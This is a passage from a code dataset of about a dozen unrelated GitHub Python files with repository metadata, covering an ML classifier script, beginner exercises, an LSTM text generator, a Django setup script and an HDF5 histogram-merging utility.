census_columns, 'All': all_columns}\n\n x_df = df[x_column_sets['All']]\n\n y_df = df[['closed_on_google']].values.ravel()\n\n X_train, X_test, y_train, y_test = train_test_split(x_df, y_df, test_size=0.33, random_state=10)\n\n print(\"Fitting, testing, and creating/saving figs for 4 classifiers...\")\n rf_model = RandomForestClassifier(n_estimators=100)\n rf_model.fit(X_train, y_train)\n plot_roc(rf_model, X_test, y_test)\n best_values, best_features = get_best_features(rf_model, X_test.columns, 10)\n plot_best_features(best_values, best_features, \"Best Features for Random Forest\",\n 10, 100, 50)\n\n gb_model = GradientBoostingClassifier(n_estimators=100)\n gb_model.fit(X_train, y_train)\n plot_roc(gb_model, X_test, y_test)\n best_values, best_features = get_best_features(gb_model, X_test.columns, 10)\n plot_best_features(best_values, best_features, \"Best Features for Gradient Boost\",\n 10, 100, 50)\n\n dt_model = DecisionTreeClassifier()\n dt_model.fit(X_train, y_train)\n plot_roc(dt_model, X_test, y_test)\n best_values, best_features = get_best_features(dt_model, X_test.columns, 10)\n plot_best_features(best_values, best_features, \"Best Features for Decision Tree\",\n 10, 100, 50)\n\n ab_model = AdaBoostClassifier()\n ab_model.fit(X_train, y_train)\n plot_roc(ab_model, X_test, y_test)\n best_values, best_features = get_best_features(ab_model, X_test.columns, 10)\n plot_best_features(best_values, best_features, \"Best Features for Ada Boost\",\n 10, 100, 50)\n\n print(\"Plotting best features within each column group...\")\n for key, columns in x_column_sets.items():\n gb_model = GradientBoostingClassifier(n_estimators=100)\n gb_model.fit(X_train[columns], y_train)\n plot_roc(gb_model, X_test[columns], y_test, title=key + \" Columns\")\n best_values, best_features = get_best_features(gb_model, X_test[columns].columns, 10)\n plot_best_features(best_values, best_features, f\"Feature Importances for {key}\",\n 10, 100, 50)\n\n all_values, all_features = get_best_features(gb_model, all_columns, len(all_columns))\n\n feature_dict = {'Yelp Basic': x_column_sets['Yelp Basic'], 'Yelp Categories': x_column_sets['Yelp Categories'],\n 'Yelp Attributes': x_column_sets['Yelp Attributes'],\n 'Yelp Reviews': x_column_sets['Top Yelp Review'],\n 'Google Maps Nearby': x_column_sets['Google Maps Nearby'],\n 'Census - Economic Data by Zip Code': x_column_sets['Census - Economic Data by Zip Code']}\n feature_category_values = {'Yelp Basic': 0, 'Yelp Categories': 0,\n 'Yelp Attributes': 0, 'Yelp Reviews': 0,\n 'Google Maps Nearby': 0,\n 'Census - Economic Data by Zip Code': 0}\n\n feature_value_pairs = dict(list(zip(all_features, all_values)))\n\n for key, values in feature_dict.items():\n for v in values:\n feature_category_values[key] += feature_value_pairs[v]\n\n plot_best_features(list(feature_category_values.values()), list(feature_category_values.keys()),\n \"Feature Importances by Category\", 10, 100, 50)\n\n print(\"All models fit and tested successfully! Check the \\'plots\\' folder\\\n one level up to see the results.\")\n","repo_name":"ellcrane/will-it-close","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41307899515","text":"# Leer un numero entero de tres digitos y determinar la suma de sus digitos.\r\n\r\ntry:\r\n\r\n numero = int(input(\"Ingrese una valor numerico: \"))\r\n\r\n if numero >=100 and numero <= 999:\r\n\r\n dig1 = numero %1000 //100\r\n dig2 = numero %100 //10\r\n dig3 = numero %10\r\n suma = dig1 + dig2 + dig3\r\n\r\n print(\"La suma de sus digitos es:\", suma)\r\n\r\n\r\n\r\nexcept ValueError:\r\n print(\"+++ERROR+++\")","repo_name":"iLoGuel/Ejercicios-basicos-en-programacion-de-software","sub_path":"Python/Ejercicios condicionales Python/ejercicio15.py","file_name":"ejercicio15.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41915608281","text":"from collections import Counter, deque\n\nn = int(input())\ninput()\nfor tcase in range(n):\n lines = []\n line = input()\n while line.replace(\" \", \"\") != \"\":\n lines.append(line)\n try:\n line = input()\n except:\n break\n \n \n counters = [Counter(l.replace(\" \", \"\")) for l in lines]\n pairs = set()\n for i, x in enumerate(counters):\n for j, y in enumerate(counters):\n if i != j and x == y:\n pair = min(lines[i], lines[j]) + \" = \" + max(lines[i], lines[j])\n pairs.add(pair)\n\n for pair in sorted(pairs):\n print(pair)\n \n if tcase != n-1: print()\n\n ","repo_name":"TobiPristupin/CompetitiveProgramming","sub_path":"UVa/Anagrams454.py","file_name":"Anagrams454.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38811985708","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef get_character_count():\n alphabet = get_alphabet()\n\n return len(alphabet)\n\ndef get_alphabet():\n return list(\"abcdefghijklmnopqrstuvwxyz \\n\")\n\ndef text_to_vector(text):\n alphabet = get_alphabet()\n vector = []\n\n for char in text:\n if char.lower() in alphabet:\n one_hot = [0] * get_character_count()\n index = alphabet.index(char.lower())\n one_hot[index] = 1\n vector.append(one_hot)\n\n return vector\n\n\ndef build_model():\n model = tf.keras.Sequential([\n tf.keras.layers.LSTM(128, input_dim=get_character_count(), return_sequences=True),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(64)),\n tf.keras.layers.Dense(32),\n tf.keras.layers.Dense(get_character_count(), activation=\"softmax\")\n ])\n\n model.compile(loss=tf.keras.losses.CategoricalCrossentropy(), optimizer=tf.keras.optimizers.Adam(0.01))\n\n return model\n\ndef train_model(model, x, y):\n print (\"Training...\")\n model.fit(x, y, epochs=30)\n model.save(\"save\")\n\ndef prep_dataset(file):\n text = open(file, \"r\").read()\n vec = text_to_vector(text)\n xs = []\n ys = []\n i = 0\n while i < len(vec) - 15:\n x = vec[i:i+15]\n y = vec[i+15]\n xs.append(x)\n ys.append(y)\n\n i += 1\n\n return xs, ys\n\nif __name__ == \"__main__\":\n model = build_model()\n x = []\n y = []\n\n for i in range(1, 9):\n a, b = prep_dataset(f\"data{i}.txt\")\n for i in a:\n x.append(i)\n for i in b:\n y.append(i)\n\n train_model(model, np.array(x, dtype=float), np.array(y, dtype=float))","repo_name":"ashwins-code/Tensorflow-Lyrics-Generator","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42307121535","text":"from impl.run import *\n\nif __name__ == '__main__':\n ob = Run()\n ob.start()\n\n\n\n\"\"\"\ndef funcion2():\n x1 = \"POO\"\n x2= \"Hola\"\n x3 = 30\n x4 = x1+x2+str(x3)+str(True)\n print(x4)\n\ndef funcion3():\n n1 = int(input(\"Numero 1:\"))\n n2 = int(input(\"Numero 2:\"))\n r = suma(n1,n2)\n print(\"Total:\"+str(r))\n\ndef funcion4():\n edad = int(input(\"Edad:\"))\n res = getAge(edad)\n print(res)\ndef funcion5():\n c= 0\n ci =0\n ac =0\n while c < 20:\n c = c+1\n if c%2!=0:\n print(c)\n ci = ci +1\n ac= ac +c\n print(\"La cantidad de impares es:\"+str(ci))\n print(\"El total acumulado es:\"+str(ac))\n\n ac = 0\n cp =0\n for i in range(1,11):\n if i % 2==0:\n cp = cp +1\n print(i)\n ac = ac +i\n\n print(\"Numero de pares es:\"+str(cp))\n print(\"Valor acumulado de pares es:\"+str(ac))\n\ndef funcion6():\n datos = (\"2F\",100,True,100.56,\"POO\")\n print(datos[2])\n datos = (True,100.56,\"POO\")\n #datos[3]=23\n for i in range(len(datos)):\n print(datos[i])\n lista = []\n lista.append(6)\n lista.append(\"2F\")\n lista.append(100)\n lista.append(False)\n lista[2]=800\n #lista.pop(1)\n del lista[1]\n print(lista)\n for i in range(len(lista)):\n print(lista[i])\n lista.clear()\n print(len(lista))\n dic = {\n \"2F\" : 200,\n 12 : \"Jorge\",\n False : (5,6,7,8),\n (5,8) : 123\n }\n dic[33]=\"POO\"\n del dic[\"2F\"]\n dic[False]=1200\n print(dic[(5,8)])\n print(dic)\n\ndef funcion7():\n nombre = input(\"Nombre:\")\n materia = input(\"Materia:\")\n n1 = float(input(\"Nota 1:\"))\n n2 = float(input(\"Nota 2:\"))\n n3 = float(input(\"Nota 3:\"))\n r = getAverange(n1,n2,n3)\n msg = getMessage(r)\n if msg!=\"Valor incorrecto!\":\n print(\"Promedio es:\"+str(round(r,2)))\n print(msg)\n else:\n print(msg)\n\ndef funcion8():\n #hhh\n tupla = (\"Registro\",\"Consulta\",\n \"Actualizar\",\"Eliminar\",\n \"Listar\",\"Salir\")\n op =getMenu(tupla)\n if op== 1:\n print(\"Python\")\n input(\" para continuar...\")\n funcion8()\n\n if op==2:\n print(\"Java\")\n input(\" para continuar...\")\n funcion8()\n if op==3:\n print(\"C++\")\n input(\" para continuar...\")\n funcion8()\n\n\n\n\ndef funcion1():\n print(\"Hola Franklin\")\n print(\"Segundo F\")\n\n#funcion8()\n\nk = inputInt(\"Ingrese su edad:\")\n\"\"\"\n","repo_name":"joseluistapia16/SegundoF1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16017057628","text":"import time\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--schema', type=str, required=True, help=\"Database schema: one of the subdirectories of RODI/data\")\nparser.add_argument('--pos_size', type=int, default=100, help=\"Number of positive samples per predicate\")\nparser.add_argument('--filterlist', type=str, default=None, help=\"Comma separated list of predicates names. If missing, all predicates in the queries are considered.\")\nparser.add_argument('--sampling', type=str, default=\"uniform\", help=\"Negative sampling: uniform/realistic\")\nparser.add_argument('--outdir', type=str, default=\"outdata\", help=\"Output directory\")\nargs = parser.parse_args()\nprint(\"\\nArguments:\")\nfor arg in vars(args):\n print(\" \", arg, getattr(args, arg))\nprint(\"\\n\")\n \nimport mappingProblem\nimport supervision\n\ndef generate(schema, true_mapping, pos_size, outdir, filterlist=None, sampling=\"uniform\"):\n print(\"SCHEMA: \", schema)\n ontology = \"RODI/data/{}/ontology.ttl\".format(schema)\n query_dir = \"RODI/data/{}/queries\".format(schema)\n datapath = \"{}/{}/{}\".format(outdir, schema, schema)\n problem = mappingProblem.MappingProblem(schema, ontology, true_mapping)\n problem.add_query_dir(query_dir)\n \n t0 = time.time()\n problem.generate_data(samplesize=pos_size, path=datapath, filterlist=filterlist, sampling=sampling)\n # problem.generate_data_neg_uniform(samplesize=pos_size, path=datapath, filterlist=filterlist)\n t1 = time.time()\n print(\"Data generation for schema {} took {:.3f} sec\".format(schema, t1 - t0))\n\n\nschema2supervision = {\n \"cmt_renamed\": supervision.cmt_renamed_mapping,\n \"cmt_structured\": supervision.cmt_structured_mapping,\n \"cmt_structured_ci\": supervision.cmt_structured_ci_mapping,\n \"cmt_naive\": supervision.cmt_naive_mapping,\n \"cmt_naive_ci\": supervision.cmt_naive_ci_mapping,\n \"cmt_denormalized\": supervision.cmt_denormalized_mapping,\n \"cmt_mixed\": supervision.cmt_mixed_mapping,\n}\n\nif args.schema in schema2supervision:\n true_mapping = schema2supervision[args.schema]\nelse:\n true_mapping = None\n\nif args.filterlist is not None:\n args.filterlist = args.filterlist.split(',')\n \ngenerate(args.schema, true_mapping, args.pos_size, args.outdir, args.filterlist, args.sampling)\n","repo_name":"zsoltzombori/mapping","sub_path":"extract/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44288298575","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nP = 10 # nombre d'itérations\nx1, x2, x3, y1, y2, y3 = 1, -1, 0, -1, -1, 1\nx0 = int(input('estimation initiale x0: '))\ny0 = int(input('estimation initiale y0: '))\nX = 0.5 #T\nY = 0.5 #L vrai position de la source\nxk = x0 #T\nyk = y0 #L position estimée de la source à la k-ième itération\nn = 3 # nombre de microphones\nx = [x1, x2, x3] #T\ny = [y1, y2, y3] #L positions respectives des microphones 1, 2 et 3\nm = [1, 1, 1] # ['input(TOA) (range estimation)' for _ in range(n)] # len(m) = 3 (= len(n))\nd, Q, D, e, Xapprox, Yapprox = [[] for _ in range(6)]\nA = []\n\n# TOA method 2D\n# x=xk+d 2 formules pour trouver d: \n# 1) Ad=D+e\n# 2) d=(A^{T}Q^{-1}A)^{-1}A^{T}Q^{-1}D\nfor _ in range(P):\n for i in range(n):\n r = np.sqrt((xk-x[i])**2 + (yk-y[i])**2) # len(r) = 1 ; r = fv \n A.append([[(xk - x[I])/r, (yk - y[I])/r] for I in range(n)])\n D.append(m[i] - r)\n e.append(1) # vecteur colonne de l'erreur à chaque itération voir Q\n print(len(np.size(A)))\n Ainv = np.linalg.inv(np.array(A))\n d.append(Ainv.dot(D+e)) # c'est ce qu'on cherche ; len(d) = i\n\n Q = 1 # ??? covariance matrix, range estimation error ??? voir avec e\n\n xk += d[0]\n yk += d[1]\n Xapprox.append(xk)\n Yapprox.append(yk)\n # fin de la première itération mettre le tout dans une boucle \n\nplt.figure()\nplt.plot(x0, y0, 'O')\nplt.plot(Xapprox, Yapprox, 'o')\nplt.plot(x, y, 's')\nplt.plot(X, Y, '*')\nplt.show()\n","repo_name":"marecmat/acoustic-source-localisation","sub_path":"taylor.py","file_name":"taylor.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11027766568","text":"# Numero palíndromo: \n\n# 123321\n# 1758571\n\n# numero: 121\n# sim\n\n# numero: 123\n# nao\n\n# numero: 3\n# sim\n\ndef palindromo(x):\n tam = None\n if (len(x) % 2 == 0):\n tam = int(len(x) / 2)\n else:\n tam = int((len(x) - 1) / 2)\n for pos in range(tam - 1):\n if(x[pos] != x[len(x) - 1 - pos]):\n return False\n return True\n\nx=input(\"qlq coisa:\")\nprint(palindromo(x))","repo_name":"AndrewHanasiro/Algoritmos","sub_path":"Python/palindromo.py","file_name":"palindromo.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73722658727","text":"from __future__ import unicode_literals\nfrom builtins import str\n\n# from lino.utils.instantiator import Instantiator\nfrom lino.api import rt, dd, _\n\n\nCompany = rt.models.contacts.Company\nPlan = rt.models.healthcare.Plan\n\ndef objects():\n # source: https://www.riziv.fgov.be/fr/professionnels/autres/mutualites/Pages/contactez-mutualites.aspx\n bxl = rt.models.countries.Place.objects.get(**dd.babel_values('name', de=\"Brüssel\", en=\"Brussels\"))\n kw = dict(country_id=\"BE\", city=bxl)\n\n def provider(ref, name, **kwargs):\n prov = Company(name=name, **kwargs)\n yield prov\n yield Plan(provider=prov, ref=ref)\n\n yield provider(_(\"Christian HIS\"), \"Alliance nationale des mutualités chrétiennes\", street=\"Haachtsesteenweg 579\", street_box=\"postbus 40\", zip_code=\"1031\")\n yield provider(_(\"Neutral HIS\"), \"Union nationale des mutualités neutres\", street=\"Chaussée de Charleroi\", street_no=\"145\", zip_code=\"1060\")\n yield provider(_(\"Socialist HIS\"), \"Union nationale des mutualités socialistes\", street=\"Rue Saint-Jean\", street_no=\"32-38\", zip_code=\"1000\")\n yield provider(_(\"Liberal HIS\"), \"Union nationale des Mutualités Libérales\", street=\"Rue de Livourne\", street_no=\"25\", zip_code=\"1050\")\n yield provider(_(\"Libre HIS\"), \"Union nationale des mutualités libres\", street=\"Lenniksebaan\", street_no=\"788A\", zip_code=\"1070\")\n\n","repo_name":"lino-framework/xl","sub_path":"lino_xl/lib/healthcare/fixtures/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22540189263","text":"import numpy as np\n\ndef loadData(fileName, arrSize=3, spliter=' '):\n fin = open(fileName, \"r\")\n lines = fin.readlines()\n cnt = len(lines)\n data = np.zeros([cnt,arrSize])\n for i in range(cnt):\n data[i] = lines[i].split(spliter)[-3:]\n # print(data[i])\n fin.close()\n return data\n\ndef outputData(fileName, data):\n fout = open(fileName, \"w\")\n for i in range(data.shape[0]):\n fout.write(str(data[i][0]) + ' ' + str(data[i][1]) + ' ' + str(data[i][2]) + '\\n')\n fout.close()\n return\n\ndef outPutFace(fileName, data) :\n fout = open(fileName, \"w+\")\n data = data.reshape(-1,3)\n for i in range(data.shape[0]):\n fout.write(str(data[i][0]) + ' ' + str(data[i][1]) + ' ' + str(data[i][2]) + '\\n')\n fout.close()\n return","repo_name":"MessyShen/3DFace2.1","sub_path":"DicLearning/dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18468242010","text":"'''\nCode credited to https://github.com/eriklindernoren/PyTorch-YOLOv3/blob/master/utils/utils.py\nMinor updates made to work with this code base\n'''\n\nimport numpy as np\nimport torchvision\nfrom matplotlib import pyplot as plt\n\ndef get_batch_statistics(outputs, targets, iou_threshold=0.5):\n \"\"\" Compute true positives, predicted scores and predicted labels per sample \"\"\"\n batch_metrics = []\n\n for output, target in zip(outputs, targets):\n\n if output is None:\n continue\n\n pred_boxes = output['boxes']\n pred_scores = output['scores']\n pred_labels = output['labels']\n\n true_positives = np.zeros(pred_boxes.shape[0])\n\n num_target_boxes = len(target['labels'])\n\n if num_target_boxes > 0:\n detected_boxes = []\n target_boxes = target['boxes']\n\n for pred_i, (pred_box, pred_label) in enumerate(zip(pred_boxes, pred_labels)):\n\n # If targets are found break\n if len(detected_boxes) == num_target_boxes:\n break\n\n # Ignore if label is not one of the target labels\n if pred_label not in target['labels']:\n continue\n\n ious = torchvision.ops.box_iou(target_boxes, pred_box.unsqueeze(0)).cpu().numpy()\n box_index = np.argmax(ious)\n iou = np.max(ious)\n if iou >= iou_threshold and box_index not in detected_boxes:\n true_positives[pred_i] = 1\n detected_boxes += [box_index]\n batch_metrics.append([true_positives, pred_scores.cpu().numpy(), pred_labels.cpu().numpy(), target['labels'].cpu().numpy()])\n return batch_metrics\n\n\ndef ap_per_class(tp, conf, pred_cls, target_cls):\n \"\"\" Compute the average precision, given the recall and precision curves.\n Source: https://github.com/rafaelpadilla/Object-Detection-Metrics.\n # Arguments\n tp: True positives (list).\n conf: Objectness value from 0-1 (list).\n pred_cls: Predicted object classes (list).\n target_cls: True object classes (list).\n # Returns\n The average precision as computed in py-faster-rcnn.\n \"\"\"\n\n # Sort by objectness\n i = np.argsort(-conf)\n tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]\n\n # Find unique classes\n unique_classes = np.unique(target_cls)\n\n # Create Precision-Recall curve and compute AP for each class\n ap, p, r = [], [], []\n for c in unique_classes:\n i = pred_cls == c\n n_gt = (target_cls == c).sum() # Number of ground truth objects\n n_p = i.sum() # Number of predicted objects\n\n if n_p == 0 and n_gt == 0:\n continue\n elif n_p == 0 or n_gt == 0:\n ap.append(0)\n r.append(0)\n p.append(0)\n else:\n # Accumulate FPs and TPs\n fpc = (1 - tp[i]).cumsum()\n tpc = (tp[i]).cumsum()\n\n # Recall\n recall_curve = tpc / (n_gt + 1e-16)\n r.append(recall_curve[-1])\n\n # Precision\n precision_curve = tpc / (tpc + fpc)\n p.append(precision_curve[-1])\n\n # AP from recall-precision curve\n ap.append(compute_ap(recall_curve, precision_curve))\n\n # Compute F1 score (harmonic mean of precision and recall)\n p, r, ap = np.array(p), np.array(r), np.array(ap)\n f1 = 2 * p * r / (p + r + 1e-16)\n\n return p, r, ap, f1, unique_classes.astype(\"int32\")\n\n\ndef compute_ap(recall, precision):\n \"\"\" Compute the average precision, given the recall and precision curves.\n Code originally from https://github.com/rbgirshick/py-faster-rcnn.\n # Arguments\n recall: The recall curve (list).\n precision: The precision curve (list).\n # Returns\n The average precision as computed in py-faster-rcnn.\n \"\"\"\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.0], recall, [1.0]))\n mpre = np.concatenate(([0.0], precision, [0.0]))\n\n # compute the precision envelope\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\n\ndef show_hp_comparison():\n hyperband = .5272\n old_hps = .3806\n\n names = ['\"Recommended\" Hyperparameters', 'With Adaptive Search']\n values = [old_hps, hyperband]\n\n plt.bar(names, values, width=0.6)\n plt.xticks(fontsize=18)\n plt.yticks(fontsize=18)\n plt.ylabel('Mean Average Preciscion', fontsize=18)\n plt.show()\n\n\ndef show_dog_comparison():\n v1 = .481\n v2 = .664\n\n names = ['Dataset V0', 'Dataset V1']\n values = [v1, v2]\n\n plt.bar(names, values, width=0.6)\n plt.xticks(fontsize=18)\n plt.yticks(fontsize=18)\n plt.ylabel('Mean Average Preciscion (dog)', fontsize=18)\n plt.show()\n","repo_name":"determined-ai/works-with-determined","sub_path":"spark_ecosystem/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"2609172268","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport django\n\nfrom django.db.utils import IntegrityError\n\nsys.path.append('.')\nos.environ['DJANGO_SETTINGS_MODULE'] = 'alfmonitor.settings'\ndjango.setup()\n\nfrom django.contrib.auth.models import Group, User\n\n\nuser_groups = (\n 'console_admins',\n 'console_users',\n)\n\n\nif __name__ == '__main__':\n admin_user = User.objects.get(username='admin')\n\n for group_name in user_groups:\n group = Group()\n group.name = group_name\n try:\n group.save()\n except IntegrityError:\n print('Group: {} alfready exists.'.format(group_name))\n\n admin_user.groups.add(Group.objects.get(name='console_admins'))\n","repo_name":"hseritt/alfmonitor","sub_path":"scripts/add_groups.py","file_name":"add_groups.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21028067639","text":"from argparse import ArgumentParser\nfrom time import time_ns\n\ndef get_floor(filepath: str) -> str:\n with open(filepath, \"r\") as filename:\n instructions = filename.readline()\n return instructions.count(\"^\") - instructions.count(\"v\")\n\ndef main(filepath: str) -> None:\n start_time = time_ns()\n answer = get_floor(filepath)\n end_time = time_ns()\n total_time = end_time - start_time\n print(f\"Go to floor {answer}.\")\n print(f\"This took {total_time} nanoseconds.\")\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"-f\", required = True)\n args = parser.parse_args()\n main(filepath = args.f)","repo_name":"cyberphor/python-programs","sub_path":"ai2c-challenges/challenge09.py","file_name":"challenge09.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19702204191","text":"from scharm.hists import HistNd\nimport h5py\nimport numpy as np\nfrom h5py import Dataset, Group\nfrom os.path import isfile, isdir, join, splitext, basename\nfrom itertools import chain\nimport os\nimport warnings\n\ndef hadd(config):\n \"\"\"\n Scales to 1 fb^-1 if scaling is requested.\n \"\"\"\n if config.recursive:\n _recursive_hadd(config)\n return\n good_files = _get_good_files(config.input_hists)\n if config.dash_hadd:\n if config.norm:\n raise ValueError('normalization not allowed for dash-hadd')\n _dash_hadd(good_files, config.output, fast=config.fast,\n aggressive=config.aggressive)\n else:\n weights_dict = {}\n if config.norm:\n raise ValueError(\"normalization not currently supported...\")\n _hadd(good_files, config.output, weights_dict, fast=config.fast)\n\ndef _get_good_files(input_hists):\n good_files = []\n for hist_file in input_hists:\n if not hist_file.endswith('.h5'):\n raise OSError(\"unrecognized extension: {}\".format(\n splitext(hist_file)[-1]))\n with h5py.File(hist_file, 'r') as h5:\n if len(h5.keys()):\n good_files.append(hist_file)\n if len(good_files) != len(input_hists):\n sys.stderr.write(\n 'ACHTUNG: only {} of {} files have any hists\\n'.format(\n len(good_files), len(input_hists)))\n return good_files\n\ndef _recursive_hadd(config):\n if not all(isdir(x) for x in config.input_hists):\n raise OSError(\"recursive hadd requires input_hists to be dir\")\n all_walk = chain(*(os.walk(x) for x in config.input_hists))\n for dirpath, dirnames, file_names in all_walk:\n if not file_names:\n continue\n out_path = join(config.output, *dirpath.split(os.path.sep)[1:])\n file_paths = [join(dirpath, x) for x in file_names]\n good_files = _get_good_files(file_paths)\n if isdir(out_path):\n raise OSError(\n \"output directory {} already exists, \"\n \" refusing overwrite\".format(out_path))\n os.makedirs(out_path)\n _dash_hadd(good_files, out_path, fast=config.fast,\n aggressive=config.aggressive)\n\ndef _dash_hadd(good_files, output, fast=False, aggressive=False):\n def key_from_name(fname):\n return splitext(basename(fname))[0].split('-')[0]\n if not isdir(output):\n os.mkdir(output)\n base_keys = {key_from_name(f) for f in good_files}\n for key in base_keys:\n out_path = join(output, '{}.h5'.format(key))\n print('making {}'.format(out_path))\n file_group = [f for f in good_files if key in f]\n missing = _get_missing_subfiles(file_group)\n if missing:\n subfiles_str = ', '.join(str(x) for x in sorted(missing))\n\n prob = \"file {} can't be created, missing subfiles: {}\".format(\n out_path, subfiles_str)\n if aggressive:\n warnings.warn(prob, stacklevel=2)\n else:\n raise IOError(prob)\n _hadd(file_group, out_path, fast=fast)\n\n\ndef _get_missing_subfiles(file_group):\n \"\"\"\n checks the 'XofY' string on the end of histogram files.\n \"\"\"\n if not 'of' in file_group[0].split('-')[-1]:\n return []\n else:\n extensions = [f.split('-')[-1] for f in file_group]\n numbers = set()\n total_set = set()\n for ext in extensions:\n num, tot = splitext(ext)[0].split('of')\n numbers.add(int(num))\n total_set.add(int(tot))\n total = int(next(iter(total_set)))\n if not len(total_set) == 1:\n gname = file_group[0].split('-')[0]\n raise IOError('two totals ({}) found for {}'.format(\n ', '.join(str(x) for x in total_set), gname))\n if not len(numbers) == total:\n return set(range(1, total + 1)) - numbers\n return []\n\ndef _hadd(good_files, output, weights_dict={}, fast=False):\n with h5py.File(good_files[0],'r') as base_h5:\n weight = weights_dict.get(good_files[0],1.0)\n hadder = HistAdder(base_h5, weight=weight, wt2_ext='Wt2')\n counter = EventCounter(base_h5)\n for add_file in good_files[1:]:\n if not isfile(add_file):\n raise IOError(\"{} doesn't exist\".format(add_file))\n if fast:\n weight = weights_dict.get(add_file, None)\n with h5py.File(add_file,'r') as add_h5:\n hadder.fast_add(add_h5, weight=weight)\n counter.add_file(add_h5)\n else:\n weight = weights_dict.get(add_file, 1.0)\n with h5py.File(add_file,'r') as add_h5:\n hadder.add(add_h5, weight=weight)\n counter.add_file(add_h5)\n if output:\n with h5py.File(output,'w') as out_file:\n hadder.write_to(out_file)\n counter.write_to(out_file)\n else:\n hadder.dump()\n\n# __________________________________________________________________________\n# counter class\nclass EventCounter:\n \"\"\"keep track of various event counts\"\"\"\n _count_keys = ['total_events', 'total_collection_tree']\n def __init__(self, base_h5):\n self._counts = {}\n for key in self._count_keys:\n self._counts[key] = base_h5.attrs.get(key, 0)\n for key, count in base_h5.attrs.items():\n if key not in self._count_keys:\n self._counts[key] = count\n def add_file(self, add_h5):\n for key in self._counts:\n self._counts[key] += add_h5.attrs.get(key, 0)\n def write_to(self, out_file):\n for key, count in self._counts.items():\n out_file.attrs[key] = count\n\n# ___________________________________________________________________________\n# HistAdder class\n\nclass HistAdder(object):\n \"\"\"\n Generic histogram adder. Traverses the first given file to map out\n histograms, then finds the corresponding hists for each call to add\n and adds them.\n \"\"\"\n def __init__(self, base_group, weight=1.0, wt2_ext=None):\n self.wt2_ext = wt2_ext\n self.hists = self._search(base_group, weight)\n\n def _search(self, group, weight):\n subhists = {}\n for key, subgroup in group.items():\n if isinstance(subgroup, Group):\n subhists[key] = self._search(subgroup, weight)\n elif isinstance(subgroup, Dataset):\n # proper treating of weighted hists\n # FIXME: this should be a hist attribute\n if self.wt2_ext and key.endswith(self.wt2_ext):\n subhists[key] = HistNd(subgroup) * weight**2\n else:\n subhists[key] = HistNd(subgroup)*weight\n else:\n raise HistAddError('not sure what to do with {} {}'.format(\n type(subgroup), key))\n return subhists\n def _merge(self, hist_dict, new_hists, weight):\n merged = {}\n for key, subgroup in hist_dict.items():\n if not key in new_hists:\n raise HistAddError(\n \"node {} not found in new hists\".format(key))\n if isinstance(subgroup, dict):\n merged[key] = self._merge(subgroup, new_hists[key], weight)\n elif isinstance(subgroup, HistNd):\n if not isinstance(new_hists[key], Dataset):\n raise HistAddError(\n \"tried to merge non-dataset {}\".format(key))\n # proper treating of weighted hists\n if self.wt2_ext and key.endswith(self.wt2_ext):\n new_hist = HistNd(new_hists[key]) * weight**2\n else:\n new_hist = HistNd(new_hists[key])*weight\n merged[key] = subgroup + new_hist\n else:\n raise HistAddError('not sure what to do with {}, {}'.format(\n type(subgroup), key))\n return merged\n\n def _fast_merge(self, hist_dict, new_hists, weight):\n \"\"\"\n circumvents lots of error checking and array copying used in the\n normal merge.\n\n Basic benchmarking:\n - fast merge: 8.025s\n - normal merge: 21.071s\n - speedup of 2.6\n \"\"\"\n keys = hist_dict.keys()\n for key in keys:\n subgroup = hist_dict[key]\n if not key in new_hists:\n raise HistAddError(\n \"node {} not found in new hists\".format(key))\n if isinstance(subgroup, dict):\n self._fast_merge(hist_dict[key], new_hists[key], weight)\n elif isinstance(subgroup, HistNd):\n if not isinstance(new_hists[key], Dataset):\n raise HistAddError(\n \"tried to merge non-dataset {}\".format(key))\n # proper treating of weighted hists\n if 